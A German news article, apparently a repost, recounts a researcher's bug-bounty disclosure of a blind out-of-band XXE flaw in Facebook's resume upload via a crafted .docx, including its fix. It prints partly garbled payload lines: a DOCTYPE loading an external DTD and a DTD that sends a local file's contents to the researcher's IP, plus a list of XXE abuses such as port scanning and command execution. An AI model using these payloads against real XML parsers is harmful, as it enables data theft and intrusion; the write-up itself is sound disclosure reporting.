Facebook-Hacking durch Einspeisung von XML-Payload in ein Word-Dokument

Table Of Contents

• Facebook-Hacking mit einem gefälschten Microsoft Word-Dokument
• Bekannte Schwachstellen
• Nachwirkungen
• Belohnung erhalten

Facebook-Hacking mit einem gefälschten Microsoft Word-Dokument

Mohamed Ramadan, ein White-Hat-Sicherheitsforscher, hat eine kritische Schwachstelle in Facebook gefunden, die es Benutzern ermöglicht, über eine gefälschte Microsoft Word .docx-Datei Kontrolle zu erlangen.

Ramadan hat erfolgreich Schwachstellen bei großen Dienstanbietern wie Google, Facebook, Twitter, Microsoft usw. gefunden und wurde von ihnen mit Bug-Bounty-Belohnungen ausgezeichnet.

Bekannte Schwachstellen

Es ist bekannt, dass Facebook nicht die sichersten Server der Welt hat. Viele Menschen haben seit 2010 schwerwiegende Fehler gemeldet, und das soziale Netzwerk hat auch eine gefährliche XXE-Schwachstelle, die OpenID betrifft, Ende 2013 gepatcht. Eine XXE (XML External Entity) ist eine Methode, die einen schwachen XML-Parsing-Mechanismus ausnutzt. Dieser Angriff kann zur Offenlegung vertraulicher Daten, zu Dienstverweigerung, Port-Scans aus der Perspektive der Maschine, auf der sich der Parser befindet, und zu anderen Systemauswirkungen führen. Sie können hier mehr über diese Fixes lesen.

Facebook hatte klargestellt, dass es alle seine Server gepatcht hatte, sodass das Finden einer weiteren XXE-Schwachstelle höchst unwahrscheinlich schien. Dennoch entschied sich Ramadan, seine Suche fortzusetzen. Nach einigem Graben stieß er auf die Karriereseite von Facebook https://www.facebook.com/careers/. Er lud erfolgreich seinen Lebenslauf auf Facebook hoch, stellte jedoch fest, dass er nur Dateien im PDF- oder .DOCX-Format hochladen konnte. Ein .docx-Dateiformat ist im Grunde ein gezipptes XML-Dateiformat, das von Microsoft entwickelt wurde, und Ramadan sah eine Lücke im Sicherheitssystem von Facebook. Er erstellte einen gefälschten Lebenslauf mit einem gefälschten Microsoft Word-Dokument und lud es auf die Facebook-Karriereseite hoch.

Er erstellte eine XML-Datei mit dem folgenden Code:

DOCTYPE root [ dtd SYSTEM “https://197.37.102.90/ext.dtd”> %dtd; %send; ]]>

Jetzt hatte er einen gefälschten Lebenslauf bereit. Er startete einen HTTP-Server, der auf Python auf seinem lokalen Computer lief. Er machte eine Datei namens ext.dtd, die im mohaab007-Verzeichnis wartete, und hier ist der Inhalt von ext.dtd:

https://197.37.102.90/FACEBOOK-HACKED?%25file;’>” > %all;

Nachdem er den gefälschten Word-Lebenslauf hochgeladen hatte, wartete er auf eine Antwort von der Facebook-Website. Wie er in seinem Blog angibt,

„Jetzt ist alles gut und dann habe ich CV.docx auf https://www.facebook.com/careers/ hochgeladen und eine Minute gewartet, aber es passierte nichts. Ich sagte mir, es ist ein totaler Fehlschlag, und ich werde stattdessen mein Facebook-Profil überprüfen und mit ein paar Freunden chatten und ein Spiel spielen oder so nach diesem langen GESCHEITERTEN Versuch. Ich habe etwa 15 Minuten damit verbracht, zu chatten und zu surfen, jetzt ist es Zeit, den Python-HTTP-Server zu stoppen und Facebook und alles zu schließen. Ich wollte mein Terminalfenster schließen und war schockiert zu sehen, dass sich etwas mit meinem Python-HTTP-Server verbunden hat.”

Er hatte es erfolgreich geschafft, einen Facebook-Server dazu zu bringen, sich mit seinem Server zu verbinden. In seinen eigenen Worten konnte er nun diese Verbindung ausnutzen, um:

• DoS des Parsing-Systems zu verursachen, indem er es öffnete, z.B. file:///dev/random | file:///dev/urandom | file://c:/con/con

• TCP-Scans unter Verwendung von HTTP-External Entities (einschließlich hinter Firewalls, da Anwendungsserver oft eine andere Sichtweise als der Angreifer haben)

• Unbefugten Zugriff auf Daten zu erhalten, die als XML-Dateien im Dateisystem des Parsing-Systems gespeichert sind (natürlich benötigt der Angreifer immer noch einen Weg, um diese Daten zurückzubekommen)

• DoS auf anderen Systemen (wenn das Parsing-System TCP-Verbindungen zu anderen Systemen herstellen darf)

• Diebstahl von NTLM-Authentifizierungsmaterial durch Initiierung des UNC-Dateizugriffs auf Systeme unter der Kontrolle des Angreifers (weit hergeholt?)

• Szenario des Weltuntergangs: Eine weit verbreitete und hochgradig verbundene Anwendung, die anfällig für diesen Angriff ist, könnte für DDoS verwendet werden.

• Verzeichnisauflistung, Lesen von System- und Anwendungsdateien und in einigen Fällen Ausführen von Systembefehlen mit dem php expect:// Wrapper.

Nachwirkungen

Er versuchte, auf Systemdateien auf dem Server zuzugreifen, konnte jedoch wahrscheinlich aufgrund der vorhandenen Sicherheitsmechanismen keinen Zugriff erhalten. Aber er war sich sicher, dass der Angriff, den er durchgeführt hatte, ein Blind XXE Out Of Band (OOB) war, und es war ein zeitaufwändiger Prozess, da er hochladen und nach 15 Minuten oder mehr auf das Ergebnis warten musste. Ohne weitere Umschweife informierte er das soziale Netzwerk über seine Erkenntnisse. Seine Erkenntnisse wurden beim ersten Mal sofort abgelehnt, mit den folgenden Worten.

Er antwortete dem Sicherheitsteam von Facebook, indem er ihnen den gefälschten Lebenslauf zusandte, woraufhin FB mit folgender Antwort zurückkam:

Er war immer noch nicht zufrieden und setzte die Korrespondenz mit dem Facebook-Sicherheitsteam fort, das letztendlich die Schwachstelle in seinem Datei-Upload-Mechanismus erkannte.

Belohnung erhalten

Facebook hat die Schwachstelle anerkannt und gemäß seiner Richtlinie Ramadan für seine Forschung belohnt. Sie haben die Schwachstelle behoben, indem sie diese Zeile Code hinzugefügt haben:

“ libxml_disable_entity_loader(true) “

Folgendes ist ein PoC-Video, das Ramadan auf YouTube hochgeladen hat, um die Schwachstelle in Facebook zu demonstrieren.

Resource : Attack Secure